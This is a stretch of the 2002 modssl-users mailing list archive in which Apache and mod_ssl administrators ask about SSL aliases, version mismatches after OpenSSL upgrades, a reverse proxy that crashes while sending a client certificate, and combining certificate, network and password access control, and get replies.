  370848 John.Airey@rnib.org.uk 

  
Reality TV - the ultimate =
oxymoron=20
  

  

    
-----Original Message-----
From: Matias Silva=20
    [mailto:mpsilva@storagecommander.com]
Sent: 18 September =
2002=20
    20:39
To: User Group mod_ssl
Subject: Using =
Aliases and=20
    SSL


    
Can anybody assist me, in using =
Aliases with=20
    ssl?.  

    
 

    
I placed several Alias directives =
within=20
    the ssl.conf file specifically =
where the=20
    virtual host is defined.  

    
This was to help assist in =
organizing the=20
    Apache server.  Of course its not working.

    
 

    
Where should I place Alias =
Directives that=20
    need to be included in the ssl area of the server =
?

    
or Does SSL even work with=20
Aliases?

    
 

    
Cheers

    
-Matt


  
- 


  
NOTICE: The information contained in =
this email=20
  and any attachments is 

  
confidential and may be legally =
privileged. If=20
  you are not the 

  
intended recipient you are hereby =
notified that=20
  you must not use, 

  
disclose, distribute, copy, print or =
rely on=20
  this email's content. If 

  
you are not the intended recipient, =
please=20
  notify the sender 

  
immediately and then delete the =
email and any=20
  attachments from your 

  
system.


  
RNIB has made strenuous efforts to =
ensure that=20
  emails and any 

  
attachments generated by its staff =
are free from=20
  viruses. However, it 

  
cannot accept any responsibility for =
any viruses=20
  which are 

  
transmitted. We therefore recommend =
you scan all=20
  attachments.


  
Please note that the statements and =
views=20
  expressed in this email 

  
and any attachments are those of the =
author and=20
  do not necessarily 

  
represent those of =
RNIB.


  
RNIB Registered Charity Number:=20
  226227


  
Website: =
http://www.rnib.org.uk=20



------=_NextPart_000_01F2_01C260B3.F78BEC30--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Sep 21 04:54:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA10439; Sat, 21 Sep 2002 04:53:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id EAA10434; Sat, 21 Sep 2002 04:53:00 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g8L2iXJB000586
	for ; Fri, 20 Sep 2002 22:44:34 -0400
Date: Fri, 20 Sep 2002 22:44:32 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: SSL Problem Under High Load with Apache-2.0.39-Mod_SSL-OpenSSL-0.9.6d-Win32
In-Reply-To: <05e801c25df6$9a11c8f0$0100a8c0@MAUCHI>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 16 Sep 2002, Ivelin Ivanov wrote:

> http://www.modssl.org/contrib/ftp/contrib/Apache-2.0.39-Mod_SSL-OpenSSL-0.9.
> 6d-Win32.zip

Absolutely positively *do not* use this version.  Apache 2.0.39 has
serious vulnerabilities on Win32, and OpenSSL 0.9.6d has serious
vulnerabilities on any platform.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Sep 21 05:48:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA11555; Sat, 21 Sep 2002 05:47:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id FAA11550; Sat, 21 Sep 2002 05:46:38 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g8L3bs4D000617
	for ; Fri, 20 Sep 2002 23:38:00 -0400
Date: Fri, 20 Sep 2002 23:37:54 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Version number
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, 20 Sep 2002 richard.mail@softhome.net wrote:

> > I've just upgraded OpenSSL 0.9.6d to 0.9.6g on FreeBSD, but Apache
> > says that it's running OpenSSL 0.9.6a!  Where is this version number
> > and how to change it?
>
> to get it right, you should recomplie apache and php to show the correct
> version numbers.  i've had the same problem and that's how i fixed it.

Just to be absolutely clear, this is not just a matter of "showing the
correct version number".  If it shows the wrong version number, that's
because that wrong version is the one actually being used by Apache!!
It's probably a matter of the old version having been statically linked
into Apache, so even after you upgrade OpenSSL, Apache still needs to be
relinked with it.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Sep 21 11:45:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA17160; Sat, 21 Sep 2002 11:44:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA17149; Sat, 21 Sep 2002 11:43:47 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id D4E124CE76A; Sat, 21 Sep 2002 11:43:45 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E83E1285C2; Sat, 21 Sep 2002 09:12:38 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pluto.cbbanorte.com.mx id AAA06032; Sat, 21 Sep 2002 00:35:09 +0200 (MET DST)
Received: from pernt02.cbbanorte.com.mx (pernt02.cbbanorte.com.mx [200.10.246.202])
	by pluto.cbbanorte.com.mx (8.11.3/8.11.3) with ESMTP id g8KMZ2502341;
	Fri, 20 Sep 2002 17:35:03 -0500
Received: by pernt02.cbbanorte.com.mx with Internet Mail Service (5.5.2653.19)
	id ; Fri, 20 Sep 2002 17:28:14 -0500
Message-ID: 
From: "Marco A. Zamora Cunningham" 
To: "'modssl-users@modssl.org'" 
Cc: "'jkellam@indiana.edu'" 
Subject: RE: Attempt to free unreferenced scalar during global destruction
Date: Fri, 20 Sep 2002 17:28:13 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id AAA06035
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Marco A. Zamora Cunningham" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

¿Are you using mod_perl? Looks like a buggy mod_perl module is complaining.

MZ

> -----Original Message-----
> From: Kellam, Jeannie K Priest [mailto:jkellam@indiana.edu]
> Sent: Friday, September 20, 2002 16:31
> To: modssl-users@modssl.org
> Subject: Attempt to free unreferenced scalar during global destruction
> 
> 
> Hi,
> 
> The following message occurred about 11 times in the ssl 
> error log in a space of about 40 minutes, during which time 
> no other activity was reported in the logs.  
> 
> "Attempt to free unreferenced scalar during global destruction"
> 
> The apache_1.3.26/mod_ssl-2.8.10-1.3.26/openssl-0.9.6g server 
> had to be restarted to fix the problem.  It's running on a 
> Sun 420R with Solaris 8.  Any ideas what would cause this?
> 
> Thanks
> 
> Jeannie
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Sep 21 11:45:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA17173; Sat, 21 Sep 2002 11:44:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA17147; Sat, 21 Sep 2002 11:43:46 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C2AA94CE752; Sat, 21 Sep 2002 11:43:45 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id A18C92888A; Sat, 21 Sep 2002 09:12:01 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pluto.cbbanorte.com.mx id VAA01995; Fri, 20 Sep 2002 21:38:56 +0200 (MET DST)
Received: from pernt02.cbbanorte.com.mx (pernt02.cbbanorte.com.mx [200.10.246.202])
	by pluto.cbbanorte.com.mx (8.11.3/8.11.3) with ESMTP id g8KJcS500705;
	Fri, 20 Sep 2002 14:38:31 -0500
Received: by pernt02.cbbanorte.com.mx with Internet Mail Service (5.5.2653.19)
	id ; Fri, 20 Sep 2002 14:31:39 -0500
Message-ID: 
From: "Marco A. Zamora Cunningham" 
To: "'modssl-users@modssl.org'" 
Cc: "'david@pladesigns.com'" 
Subject: RE: Windows Builds?
Date: Fri, 20 Sep 2002 14:31:38 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C260DC.56E03100"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Marco A. Zamora Cunningham" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C260DC.56E03100
Content-Type: text/plain;
	charset="iso-8859-1"

I've seen a site that promises free windows binaries with SSL, PHP4, ASP and
ColdFusion support and a painless InstallShield setup under a BSD license.
    The Open Server Architecture Project:
    http://www.opensa.org/  
 
It's last update was August 19. It probably has all important bugfixes
included (from http://www.opensa.org/development/news/101.html
 ):
 Apache 1.3.26
 PHP 4.2.2
 mod_ssl 2.8.10
 OpenSSL 0.9.6g
 
I haven't used it myself, though I might soon...            MZ

-----Original Message-----
From: David Buerer [mailto:david@pladesigns.com]
Sent: Friday, September 20, 2002 11:21
To: 'modssl-users@modssl.org'
Subject: Windows Builds?


I feel like an idiot this morning...but not more than six months ago I
installed apache+openssl+modssl on an NT machine and I downloaded the binary
build from somewhere.  For the life of me thought, I can not find the site!
Anyone have any ideas?  I am trying to find an updated version with a more
current version of apache, bug fixes, and the like.
 
Thanks,
David
 


------_=_NextPart_001_01C260DC.56E03100
Content-Type: text/html;
	charset="iso-8859-1"









I've 
seen a site that promises free windows binaries with SSL, PHP4, ASP 
and ColdFusion support and a painless InstallShield setup under a BSD 
license.


    The Open Server Architecture 
Project:



 


It's 
last update was August 19. It probably has all important bugfixes included (from 
http://www.opensa.org/development/news/101.html):


 Apache 1.3.26
 PHP 4.2.2
 mod_ssl 
2.8.10
 OpenSSL 0.9.6g


 


I 
haven't used it myself, though I might 
soon...            
MZ



  
-----Original Message-----
From: David Buerer 
  [mailto:david@pladesigns.com]
Sent: Friday, September 20, 2002 
  11:21
To: 'modssl-users@modssl.org'
Subject: Windows 
  Builds?


  
I feel like an 
  idiot this morning...but not more than six months ago I installed 
  apache+openssl+modssl on an NT machine and I downloaded the binary build from 
  somewhere.  For the life of me thought, I can not find the site! Anyone 
  have any ideas?  I am trying to find an updated version with a more 
  current version of apache, bug fixes, and the like.

  
 

  
Thanks,

  
David

  
 


------_=_NextPart_001_01C260DC.56E03100--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Sep 22 04:35:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA07626; Sun, 22 Sep 2002 04:34:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.epremiumsystems.com id EAA07621; Sun, 22 Sep 2002 04:33:25 +0200 (MET DST)
Received: from FALCON ([203.125.85.26])
          by smtp.epremiumsystems.com (Lotus Domino Release 5.0.5)
          with ESMTP id 2002092210515969:301 ;
          Sun, 22 Sep 2002 10:51:59 +0800 
From: "Lee Hoo Wah" 
To: 
Subject:  SSL Reverse Proxy with Client Certificate is dying
Date: Sun, 22 Sep 2002 10:33:13 +0800
Message-ID: 
MIME-Version: 1.0
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-MIMETrack: Itemize by SMTP Server on starwars/Premium(Release 5.0.5 |September 22, 2000) at
 09/22/2002 10:51:59 AM,
	Serialize by Router on starwars/Premium(Release 5.0.5 |September 22, 2000) at
 09/22/2002 10:52:07 AM,
	Serialize complete at 09/22/2002 10:52:07 AM
Content-Transfer-Encoding: 7bit
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lee Hoo Wah" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I have a problem using Apache/mod_ssl 2.0.40 as a SSL reverse proxy to
connect to a SSL Server.

	|HTTP Client|-----http---->|Reverse Proxy|----https---->|Web Server|

There is a Client Certificate on the Reverse Proxy which must be presented
to the Web Server for authentication. But I see from the log files, after
the initial SSL handshaking, immediately after the "Proxy client certificate
callback: (xxx.xxx.xxx:80) found acceptable cert", the child process on the
Reverse Proxy just dies without any error in the log file. The child process
initialises itself all over again. My browser on the front end receives a
"Page not found" error.

I double checked my cert pathing using "openssl" and curl to go into the SSL
server and it works. So I think the certificate should be ok. Are there
anything else that I have left out?

I have also tested against both a IIS 5.0 and an Apache 2.0 web server. Both
returns the same error.

Really appreciate any help that might come along. Thanks in advace.

regards,
Lee Hoo Wah

____________________________________________
[debug] ssl_engine_kernel.c(1854): OpenSSL: Loop: SSLv3 read server hello A
[debug] ssl_engine_kernel.c(1294): Certificate Verification: depth: 2,
subject: /C=US/O=GTE Corporation/CN=GTE CyberTrust Root, issuer: /C=US/O=GTE
Corporation/CN=GTE CyberTrust Root
[debug] ssl_engine_kernel.c(1294): Certificate Verification: depth: 1,
subject: /C=US/O=Entrust.net/OU=www.entrust.net/CPS incorp. by ref. (limits
liab.)/OU=(c) 1999 Entrust.net Limited/CN=Entrust.net Secure Server
Certification Authority, issuer: /C=US/O=GTE Corporation/CN=GTE CyberTrust
Root
[debug] ssl_engine_kernel.c(1294): Certificate Verification: depth: 0,
subject: /C=SG/ST=Singapore/L=Singapore/O=xxx/OU=xxx/CN=xxx, issuer:
/C=US/O=Entrust.net/OU=www.entrust.net/CPS incorp. by ref. (limits
liab.)/OU=(c) 1999 Entrust.net Limited/CN=Entrust.net Secure Server
Certification Authority
[debug] ssl_engine_kernel.c(1854): OpenSSL: Loop: SSLv3 read server
certificate A
[debug] ssl_engine_kernel.c(1854): OpenSSL: Loop: SSLv3 read server
certificate request A
[debug] ssl_engine_kernel.c(1854): OpenSSL: Loop: SSLv3 read server done A
[debug] ssl_engine_kernel.c(1620): Proxy client certificate callback:
(xxx.xxx.xxx:80) entered
[debug] ssl_engine_kernel.c(1593): Proxy client certificate callback:
(xxx.xxx.xxx:80) found acceptable cert, sending
/C=xx/O=xxx/OU=xxx/OU=xxx/SN=xxx/CN=xxxx
[notice] Parent: child process exited with status 3221225477 -- Restarting.
<<<<<< CHILD PROCESS DIES
[debug] mpm_winnt.c(562): Parent: Marked listeners as not inheritable.
[info] Init: Initializing OpenSSL library

_______________________________________


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Sep 22 11:12:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA14416; Sun, 22 Sep 2002 11:11:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA14408; Sun, 22 Sep 2002 11:10:24 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 178164CE697; Sun, 22 Sep 2002 11:10:25 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 15E1A2873B; Sun, 22 Sep 2002 09:39:25 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.epremiumsystems.com id HAA10491; Sun, 22 Sep 2002 07:23:48 +0200 (MET DST)
Received: from FALCON ([203.125.85.26])
          by smtp.epremiumsystems.com (Lotus Domino Release 5.0.5)
          with ESMTP id 2002092213422340:302 ;
          Sun, 22 Sep 2002 13:42:23 +0800 
From: "Lee Hoo Wah" 
To: 
Subject: RE:  SSL Reverse Proxy with Client Certificate is dying
Date: Sun, 22 Sep 2002 13:23:37 +0800
Message-ID: 
MIME-Version: 1.0
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-MIMETrack: Itemize by SMTP Server on starwars/Premium(Release 5.0.5 |September 22, 2000) at
 09/22/2002 01:42:23 PM,
	Serialize by Router on starwars/Premium(Release 5.0.5 |September 22, 2000) at
 09/22/2002 01:42:30 PM,
	Serialize complete at 09/22/2002 01:42:30 PM
Content-Transfer-Encoding: 7bit
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lee Hoo Wah" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all,

Apologies for duplicating this email again. I had some problems with my
mailbox and thought that the original email did not get through. I also
updated the version of the Apache version from  2.0.39 to  2.0.40 because I
tested both with the same results.

Regarding the question itself, I would really appreciate if somebody could
give some suggestions.

Thanks again.

regards,
Lee Hoo Wah

-----Original Message-----
From: Lee Hoo Wah [mailto:leehw@epremiumsystems.com]
Sent: Sunday, September 22, 2002 10:33 AM
To: modssl-users@modssl.org
Subject: SSL Reverse Proxy with Client Certificate is dying


Hi,

I have a problem using Apache/mod_ssl 2.0.40 as a SSL reverse proxy to
connect to a SSL Server.

	|HTTP Client|-----http---->|Reverse Proxy|----https---->|Web Server|

There is a Client Certificate on the Reverse Proxy which must be presented
to the Web Server for authentication. But I see from the log files, after
the initial SSL handshaking, immediately after the "Proxy client certificate
callback: (xxx.xxx.xxx:80) found acceptable cert", the child process on the
Reverse Proxy just dies without any error in the log file. The child process
initialises itself all over again. My browser on the front end receives a
"Page not found" error.

I double checked my cert pathing using "openssl" and curl to go into the SSL
server and it works. So I think the certificate should be ok. Are there
anything else that I have left out?

I have also tested against both a IIS 5.0 and an Apache 2.0 web server. Both
returns the same error.

Really appreciate any help that might come along. Thanks in advace.

regards,
Lee Hoo Wah

____________________________________________
[debug] ssl_engine_kernel.c(1854): OpenSSL: Loop: SSLv3 read server hello A
[debug] ssl_engine_kernel.c(1294): Certificate Verification: depth: 2,
subject: /C=US/O=GTE Corporation/CN=GTE CyberTrust Root, issuer: /C=US/O=GTE
Corporation/CN=GTE CyberTrust Root
[debug] ssl_engine_kernel.c(1294): Certificate Verification: depth: 1,
subject: /C=US/O=Entrust.net/OU=www.entrust.net/CPS incorp. by ref. (limits
liab.)/OU=(c) 1999 Entrust.net Limited/CN=Entrust.net Secure Server
Certification Authority, issuer: /C=US/O=GTE Corporation/CN=GTE CyberTrust
Root
[debug] ssl_engine_kernel.c(1294): Certificate Verification: depth: 0,
subject: /C=SG/ST=Singapore/L=Singapore/O=xxx/OU=xxx/CN=xxx, issuer:
/C=US/O=Entrust.net/OU=www.entrust.net/CPS incorp. by ref. (limits
liab.)/OU=(c) 1999 Entrust.net Limited/CN=Entrust.net Secure Server
Certification Authority
[debug] ssl_engine_kernel.c(1854): OpenSSL: Loop: SSLv3 read server
certificate A
[debug] ssl_engine_kernel.c(1854): OpenSSL: Loop: SSLv3 read server
certificate request A
[debug] ssl_engine_kernel.c(1854): OpenSSL: Loop: SSLv3 read server done A
[debug] ssl_engine_kernel.c(1620): Proxy client certificate callback:
(xxx.xxx.xxx:80) entered
[debug] ssl_engine_kernel.c(1593): Proxy client certificate callback:
(xxx.xxx.xxx:80) found acceptable cert, sending
/C=xx/O=xxx/OU=xxx/OU=xxx/SN=xxx/CN=xxxx
[notice] Parent: child process exited with status 3221225477 -- Restarting.
<<<<<< CHILD PROCESS DIES
[debug] mpm_winnt.c(562): Parent: Marked listeners as not inheritable.
[info] Init: Initializing OpenSSL library

_______________________________________

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 23 13:14:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA13324; Mon, 23 Sep 2002 13:13:55 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id NAA13153; Mon, 23 Sep 2002 13:12:46 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 985894CE744; Mon, 23 Sep 2002 13:12:46 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id DC111286B8; Mon, 23 Sep 2002 13:11:19 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from persephone.cfrq.net id AAA29365; Mon, 23 Sep 2002 00:53:41 +0200 (MET DST)
Received: from elisabeth.cfrq.net (elisabeth.chk.cfrq.net [199.85.99.82] (may be forged))
	by persephone.cfrq.net (8.12.2/8.12.2) with ESMTP id g8MMrb9c013049
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=OK)
	for ; Sun, 22 Sep 2002 18:53:39 -0400
Received: from elisabeth.cfrq.net (localhost [127.0.0.1])
	by elisabeth.cfrq.net (8.12.2/8.12.2) with ESMTP id g8MMrWFm030516
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO)
	for ; Sun, 22 Sep 2002 18:53:34 -0400
Received: from elisabeth.cfrq.net (chk@localhost)
	by elisabeth.cfrq.net (8.12.2/8.12.2/Submit) with ESMTP id g8MMrUMb030508
	for ; Sun, 22 Sep 2002 18:53:31 -0400
X-Authentication-Warning: elisabeth.cfrq.net: chk owned process doing -bs
To: modssl-users@modssl.org
Subject: certificate + network ACL + passwords problem?
From: Harald Koch 
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-ID: <30505.1032735209.1@elisabeth.cfrq.net>
Date: Sun, 22 Sep 2002 18:53:29 -0400
Message-ID: <30507.1032735209@elisabeth.cfrq.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Harald Koch 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I've tried this both with the stock (fully patched) RedHat 7.2, and with
a fresh-built Apache 1.3.26 + modssl-2.8.10-1.3.26 + openssl-0.9.6g.

With the attached config snippet for a "private" directory, based on the
samples from the documentation, the webserver first asks me for my
certificate, successfully validates it, and *then* asks me for a
username/password. I know the certificate is successfully authenticated,
as I've modified my CustomLog entry to log the values of
SSL_CLIENT_S_DN, SSL_CLIENT_VERIFY, and SSL_CIPHER_USEKEYSIZE.

If I comment out the four lines for network-based access control:

    #Order                   deny,allow
    #Deny                    from all
    #Allow                   from 127.0.0.1
    #Allow                   from 199.85.99.0/24

Then I get my expected behaviour, which is:
- if I give a certificate, I get access
- if I don't give a certificate, I am asked for username/password

Am I being dense about combining access control methods, or is there a
bug somewhere?

Thanks in advance,

-- 
Harald Koch     

"It takes a child to raze a village."
		-Michael T. Fry



    #       any "intranet' access is allowed
    #       but from the Internet only HTTPS + Strong-Cipher + Password
    #       or the alternative HTTPS + Strong-Cipher + Client-Certificate

    #       If HTTPS is used, make sure a strong cipher is used.
    # Additionally, allow client certs as an alternative to basic auth.
    SSLRequireSSL
    SSLVerifyClient         optional
    SSLVerifyDepth          2
    SSLOptions              -StrictRequire +OptRenegotiate +StdEnvVars
    SSLRequire ( %{SSL_CIPHER_USEKEYSIZE} >= 128 and %{SSL_CLIENT_VERIFY} eq "SUCCESS" )

    #   Allow any of certs, network access or basic auth
    Satisfy                 any

    #   Network Access Control
    Order                   deny,allow
    Deny                    from all
    Allow                   from 127.0.0.1
    Allow                   from 199.85.99.0/24

    #   HTTP Basic Authentication
    AuthType                Basic
    AuthName                "CFRQ users"
    AuthUserFile            /etc/httpd/conf/passwd
    Require                 valid-user

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 23 13:23:37 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA14243; Mon, 23 Sep 2002 13:22:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhub.AXP.MDX.AC.UK id NAA14184; Mon, 23 Sep 2002 13:21:45 +0200 (MET DST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636)
 id <01KMU91NHAKG00MOM0@mdx.ac.uk> for modssl-users@modssl.org; Mon,
 23 Sep 2002 12:21:45 +0100 (BST)
Received: from mdx-bg-staff1.nw.mdx.ac.uk
 (mdx-bg-staff1.mdx.ac.uk [158.94.39.4]) by mdx.ac.uk (PMDF V6.1-1 #38636)
 with ESMTP id <01KMU91FXP2G00OLGM@mdx.ac.uk> for modssl-users@modssl.org; Mon,
 23 Sep 2002 12:21:35 +0100 (BST)
Received: from MDX-BG-STAFF1/SpoolDir by mdx-bg-staff1.nw.mdx.ac.uk
 (Mercury 1.48); Mon, 23 Sep 2002 12:18:38 +0000
Received: from SpoolDir by MDX-BG-STAFF1 (Mercury 1.48); Mon,
 23 Sep 2002 12:18:26 +0000
Date: Mon, 23 Sep 2002 12:18:16 +0000
From: a.moon@mdx.ac.uk
Subject: certificate + network ACL + passwords problem?
To: modssl-users@modssl.org
Message-id: <881F1CD3EFA@mdx-bg-staff1.nw.mdx.ac.uk>
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Due to unaviodable circumstances, I am away from the office until the Monday 30th September 2002 

I will get back to you as soon as i can on my return.

If it's an urgent Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter
that requires urgent attention then  please contact either  Kirsteen1, Sanjay1 or Jeff1
who should be able to help.

If the problem relates to mubsweb please contact sanjay1
If the probelm relates to OASIS or WebCT please contact Kirsteen1
If your query  relates to mbs1111 or it support please contact Jeff1

All the best 
Alex
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 23 15:02:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA16810; Mon, 23 Sep 2002 15:01:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id OAA16675; Mon, 23 Sep 2002 14:59:41 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g8NCx5P32738
	for ; Mon, 23 Sep 2002 13:59:25 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Mon, 23 Sep 2002 13:59:02 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F20EA@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: certificate + network ACL + passwords problem?
Date: Mon, 23 Sep 2002 13:58:59 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I think it's just the way you use allow, deny. I would have put this myself:

     Order                   deny,allow
     Deny                    from all
     Allow                   from 127.0.0.1, 199.85.99.

The Allow syntax has always seemed odd to me. What appears in the
documentation at http://httpd.apache.org/docs/mod/mod_access.html#allow
doesn't all work for me.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
